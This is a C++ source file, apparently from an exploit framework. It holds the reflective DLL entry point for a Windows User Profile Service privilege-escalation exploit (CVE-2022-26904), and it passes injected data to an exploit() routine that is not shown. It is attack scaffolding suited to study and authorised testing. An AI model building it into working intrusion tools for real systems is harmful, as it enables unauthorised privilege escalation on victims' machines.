external/source/exploits/CVE-2022-26904/SuperProfileDLL/dllmain.cpp
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "ReflectiveLoader.c"
#include <stdio.h>
#include <stdint.h>
#include <windows.h>
#include "ProfSvcLPE.h"
// Note we need to define this as an export. For the purpose of our code
// this can be a normal C++ export with standard name mangling,
// but if we needed this to be C compatible
// we would just put extern "C" in front of this.
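/*
 * Thin entry point: hands the caller-supplied data pointer to exploit().
 *
 * incomingData - opaque pointer received from DllMain's lpReserved argument.
 *                It is forwarded unchanged; no NULL or length check happens
 *                here, so any validation must live in exploit().
 *
 * Returns 0 unconditionally. Whatever exploit() reports is not inspected.
 *
 * NOTE(review): exploit() is not defined in this file - presumably it is
 * declared in ProfSvcLPE.h; confirm. No export specifier is visible on this
 * definition either; confirm whether one is applied elsewhere.
 */
int main(char * incomingData) {
    exploit(incomingData);
    // Explicit result so this int function never ends without a return value.
    return 0;
}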
/*
 * Custom DLL entry point (REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN is defined
 * at the top of this file).
 *
 * hinstDLL   - module handle for this DLL; cached in hAppInstance.
 * dwReason   - notification code selecting the action below.
 * lpReserved - meaning depends on dwReason:
 *                DLL_QUERY_HMODULE  : if non-NULL, treated as an HMODULE*
 *                                     out-parameter that receives the handle.
 *                DLL_PROCESS_ATTACH : reinterpreted as char* and passed to
 *                                     main() unchanged.
 *
 * Always returns TRUE, whatever the reason code and whatever main() does.
 */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    if (dwReason == DLL_QUERY_HMODULE)
    {
        // Record our module handle and hand it back when the caller
        // supplied somewhere to put it.
        hAppInstance = hinstDLL;
        if (lpReserved != NULL)
        {
            *(HMODULE*)lpReserved = hAppInstance;
        }
    }
    else if (dwReason == DLL_PROCESS_ATTACH)
    {
        hAppInstance = hinstDLL;

        // NOTE(review): the original comment on this call says main() cannot
        // be invoked from DllMain without hanging, yet the call is made
        // inline here. Microsoft's DllMain guidance restricts what may safely
        // run during process attach; confirm how this entry point is reached
        // and whether that restriction applies:
        //   https://docs.microsoft.com/en-us/windows/win32/dlls/dllmain
        //   https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-best-practices
        // lpReserved is forwarded without validation.
        main((char*)lpReserved);
    }
    // DLL_PROCESS_DETACH, DLL_THREAD_ATTACH, DLL_THREAD_DETACH and any other
    // reason code: nothing to do.

    return TRUE;
}